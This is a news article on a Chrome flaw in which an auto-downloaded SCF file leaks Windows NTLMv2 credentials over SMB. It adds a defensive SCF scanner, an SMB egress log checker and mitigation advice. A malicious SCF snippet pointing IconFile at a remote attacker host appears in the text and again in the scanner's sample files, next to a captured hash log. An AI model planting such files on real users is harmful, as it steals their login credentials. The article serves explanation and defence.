A security researcher has found a serious vulnerability in the latest version of Google Chrome that affects every version of Windows, including Windows 10. The vulnerability allows hackers to steal your Windows login credentials.
Researcher Bosko Stankovic of DefenseCode has found that merely visiting a website that serves a malicious SCF file can cause victims to unknowingly share their computer's login credentials with attackers, via Chrome and the SMB protocol.
The technique itself is not new: Stuxnet, the powerful malware specially designed to sabotage Iran's nuclear program, used Windows shortcut (LNK) files to compromise systems in a similar way.
Chrome + SCF + SMB = Windows Login Credentials Hacked
SCF (Shell Command File) is a shortcut-like file format that works much like LNK files. It supports a restricted set of Windows shell commands that define an icon on your desktop, such as My Computer and the Recycle Bin.
All the hacker needs is for the victim to be running an up-to-date Google Chrome and to visit his site; the victim's authentication credentials are then captured and ready to be used, as Stankovic explains in the blog post describing the flaw.
An SCF file is essentially a desktop shortcut whose text describes the location of an icon or thumbnail, and the name and location of the application it points to, for example:
[shell]
command=2
IconFile=explorer.exe,3
Chrome trusts Windows SCF files. The hacker simply crafts an SCF file containing the malicious reference; when the victim visits his site, the file is downloaded automatically without asking the user for confirmation.
As soon as the user opens the download folder, whether immediately or later, the file is processed without ever being clicked: Windows Explorer tries to fetch the icon from the remote SMB server named in the file, and that server is controlled by the hacker:
[shell]
IconFile=\\170.170.170.170/icon
The malicious file causes the login credentials to be sent to the hacker, as in this capture:
[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
The credentials are not transmitted in plain text (what is captured is the NTLMv2 challenge/response), but they can be brute-forced offline later to recover the original login password in plain text.
SCF files appear extensionless in Explorer: the researcher notes that a file named picture.jpg.scf is displayed in Windows Explorer as a JPG. This property of SCF files is what makes the attack so inconspicuous.
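The two properties described above (an IconFile entry that points at a remote UNC path, and a disguised double extension such as picture.jpg.scf) are exactly what a defender can look for in a download folder before Explorer renders it. The following scanner is an added example written for this article, not code from DefenseCode or the researcher's post; the sample files it builds are constructed for the demo, and the address 170.170.170.170 is the one from the article's own SCF sample.

```python
"""
Added example (not from the DefenseCode write-up): scan a download folder for
SCF files whose IconFile points at a UNC path, the pattern that makes Explorer
start an SMB authentication to whatever host the file names.
"""
import ipaddress
import os
import re
import tempfile

# IconFile values of the form \\host\... or \\host/... name a UNC resource.
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")

# A document/image-looking name ending in .scf (Explorer hides the .scf part).
DOUBLE_EXT_RE = re.compile(r"\.(jpe?g|png|gif|pdf|docx?|txt)\.scf$", re.IGNORECASE)


def parse_scf(text: str) -> dict:
    """Parse the INI-like SCF body into {section: {key: value}}, names lower-cased."""
    result, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            result.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            result[section][key.strip().lower()] = value.strip()
    return result


def classify_icon_target(icon_file: str):
    """Return (host, kind): kind is 'unc-public', 'unc-private', 'unc-name', or None for a local path."""
    m = UNC_RE.match(icon_file)
    if not m:
        return None, None
    host = m.group(1)
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host, "unc-name"  # a DNS/NetBIOS name rather than a literal address
    return host, "unc-private" if (ip.is_private or ip.is_loopback) else "unc-public"


def scan_directory(directory: str) -> list:
    """Return one finding per .scf file that references a UNC host or hides behind a double extension."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.lower().endswith(".scf"):
            continue
        with open(os.path.join(directory, name), "r", encoding="utf-8", errors="replace") as fh:
            sections = parse_scf(fh.read())
        icon = sections.get("shell", {}).get("iconfile", "")
        host, kind = classify_icon_target(icon)
        reasons = []
        if kind:
            reasons.append(f"IconFile references UNC host {host} ({kind})")
        if DOUBLE_EXT_RE.search(name):
            reasons.append("disguised double extension (shown without .scf in Explorer)")
        if reasons:
            findings.append({"file": name, "icon_file": icon, "host": host, "reasons": reasons})
    return findings


def demo() -> list:
    """Build a constructed download folder with three SCF files and scan it."""
    samples = {
        "shortcut.scf": "[shell]\ncommand=2\nIconFile=explorer.exe,3\n",           # benign, local icon
        "picture.jpg.scf": "[shell]\nIconFile=\\\\170.170.170.170/icon\n",          # remote host, disguised name
        "intranet.scf": "[Shell]\nCommand=2\nIconFile=\\\\fileserver\\share\\icon.ico\n",  # UNC by name
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            with open(os.path.join(tmp, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_directory(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding["file"], "->", "; ".join(finding["reasons"]))
```

Any UNC IconFile in a file that arrived via a browser download deserves attention; the public/private split only helps with triage, since an internal hostname can still be spoofed on a hostile network.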
How to Prevent This Remote SMB Server Attack:
First, block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN at the firewall, so that local computers cannot query remote SMB servers.
The researcher also advises users to consider disabling automatic downloads in Google Chrome: go to Settings → Show advanced settings → and check the "Ask where to save each file before downloading" option.
With automatic downloads disabled, the hacker's file is no longer saved to disk without the user's involvement, so it never gets processed.
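The firewall rule above is the first mitigation, and its log is also where a defender can see whether any internal host has already tried to reach an SMB server on the Internet. The script below is an added example written for this article, not code from the researcher or DefenseCode: it reads constructed, syslog-style firewall records and flags outbound TCP 139/445 from private addresses to non-private destinations, distinguishing attempts that were blocked from those the firewall let through (where an NTLM challenge/response may already have reached the remote server). The record format, timestamps and internal addresses are constructed; 170.170.170.170 is the address from the article's SCF sample.

```python
"""
Added example, not part of the original article: find outbound SMB
(TCP 139/445) from internal hosts to external destinations in firewall
records, the traffic the article recommends blocking at the perimeter.
"""
import ipaddress
import re

SMB_PORTS = {139, 445}

# Constructed record format: "<timestamp> src=<ip>:<port> dst=<ip>:<port> proto=<proto> action=<allow|block>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+):(?P<sport>\d+) "
    r"dst=(?P<dst>[\d.]+):(?P<dport>\d+) proto=(?P<proto>\w+) action=(?P<action>\w+)$"
)

# Constructed sample log: one allowed SMB egress, one internal SMB session,
# one blocked SMB egress, one ordinary HTTPS connection, one unparsable line.
SAMPLE_LOG = """\
2017-05-15T13:10:41Z src=192.168.1.20:62521 dst=170.170.170.170:445 proto=tcp action=allow
2017-05-15T13:10:42Z src=192.168.1.20:62530 dst=192.168.1.5:445 proto=tcp action=allow
2017-05-15T13:10:43Z src=192.168.1.31:51000 dst=170.170.170.170:139 proto=tcp action=block
2017-05-15T13:10:44Z src=192.168.1.31:51001 dst=170.170.170.170:443 proto=tcp action=allow
garbage line that does not match the record format
"""


def parse_record(line: str):
    """Parse one record into a dict; return None for lines that do not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def is_smb_egress(rec: dict) -> bool:
    """True when a private-address host talks SMB over TCP to a destination outside private space."""
    if rec["proto"].lower() != "tcp" or rec["dport"] not in SMB_PORTS:
        return False
    src = ipaddress.ip_address(rec["src"])
    dst = ipaddress.ip_address(rec["dst"])
    return src.is_private and not (dst.is_private or dst.is_loopback)


def find_smb_egress(log_text: str) -> list:
    """Return one finding per outbound SMB record; 'allowed' marks attempts the firewall let through."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None or not is_smb_egress(rec):
            continue
        findings.append({
            "ts": rec["ts"],
            "src": rec["src"],
            "dst": f'{rec["dst"]}:{rec["dport"]}',
            "allowed": rec["action"].lower() == "allow",
        })
    return findings


if __name__ == "__main__":
    for f in find_smb_egress(SAMPLE_LOG):
        state = "ALLOWED - possible credential exposure, check the source host" if f["allowed"] else "blocked by policy"
        print(f'{f["ts"]} {f["src"]} -> {f["dst"]}: {state}')
```

An allowed hit is the one to act on: the user on that host should be treated as having exposed an NTLMv2 response, which, as the article notes, can be brute-forced offline, so a password change is the conservative response.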
Google is aware of this vulnerability and is working on it. As soon as the patch becomes available.